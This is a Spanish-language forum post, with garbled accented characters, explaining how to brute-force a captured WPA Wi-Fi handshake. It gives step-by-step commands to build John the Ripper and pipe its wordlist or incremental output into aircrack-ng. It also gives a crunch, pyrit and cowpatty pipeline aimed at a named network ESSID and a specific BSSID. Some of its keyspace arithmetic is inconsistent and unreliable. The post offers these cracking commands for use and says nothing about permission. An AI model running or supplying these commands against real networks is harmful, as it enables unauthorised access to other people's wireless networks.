Prologo:
Este ataque consiste en generar un diccionario secuencial y almacenarlo o mandí¡rselo directamente a aircrack-ng. Como normalmente las claves WPA admiten como mínimo 8 caracteres y como mí¡ximo 64, es inítil usar diccionarios con palabras inferiores a 8 caracteres. Si tenemos la suerte de que la clave sea de 8 caracteres, pues bien, son 324.293.000.000.000.000.000.000 combinaciones, por lo que podemos tardar sílo unos pocos aíños.
Por ejemplo cogiendo las letras de a-z sin contar íñ y cogiendo solo minísculas serían 26 letras, mas 10 nímeros en total, 36 caracteres y la clave WPA que elegimos es de 15 caracteres.
abcdefghijklmnopqrstuvwxyz0123456789 ---> 36 caracteres
36 caracteres= 221.073.919.720.733.357.899.776 palabras
Suponiendo que el programa, y nuestro ordenador sea capaz de analizar 200.000 palabras por segundo (cosa que dudo mucho), pues tardaría 3.505.104.000 aíños (jíderrrrrrr).
Para el ataque por fuerza bruta usaremos el programa Johntheripper, como NO lo tenemos en Wifiway tenemos que instalado, para ello lanzamos lo siguientes comandos:
wget http://www.openwall.com/john/f/john-1.7.0.2.tar.gz
tar -xzvf john-1.7.0.2.tar.gz
cd john-1.7.0.2/src
make clean generic
cd ..
cd run
cp john /usr/local/bin/
Para lanzar John con diccionario usar este comando:
john --stdout --wordlist=<diccionario> --rules | aircrack-ng â€"e <essid> -a 2 -w â€" <archive.cap>
Para usar John como fuerza bruta y que tome todas las combinaciones, usar este comando:
John -incremental=all | aircrack-ng.exe â€"e <essid> -a 2 -w â€" <archivo.cap>
hay un comando para detener a john the ripper y luego con mas tiempo retomar el trabajo
john --wordlist=<DICCIONARIO> --rules --stdout | aircrack-ng -b 00:21:29:B4:07:19 -w - <DUMPLOG>
john --restore | aircrack-ng -b 00:21:29:B4:07:19 -w - <DUMPLOG>
tambien tenemos otra forma que es utilizar a Crunch y CoWPAtty.
Crunch: es un programa que crea diccionarios, con letras, numeros y espacios. A Crunch lo podemos encontrar en la suite de BackTrack 4.
CoWPAtty: simplemente es un programa que comienza a probar contraseíñas de un diccionario.
simplemente lo que haremos es lo siguiente. tomaremos basicamente las funcion del Crunch y le seguiremos con el CoWPAtty para no tener que crear un diccionario que tenga mucho peso.
crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | pyrit -e Orange-x4ex -i - -o - passthrough | cowpatty -d - -r /root/WPA.cap-01.cap -s Orange-x4ex
otra forma:
http://www.youtube.com/v/s8hR3By8v_E
si como tu dices, vamos a tardar tanto tiempo, de que nos sirve usar john ?
You are not allowed to view links.
Register or Login
si como tu dices, vamos a tardar tanto tiempo, de que nos sirve usar john ?
y quisas se dea la casualidad de que justo lo mandas y te saca la contraseíña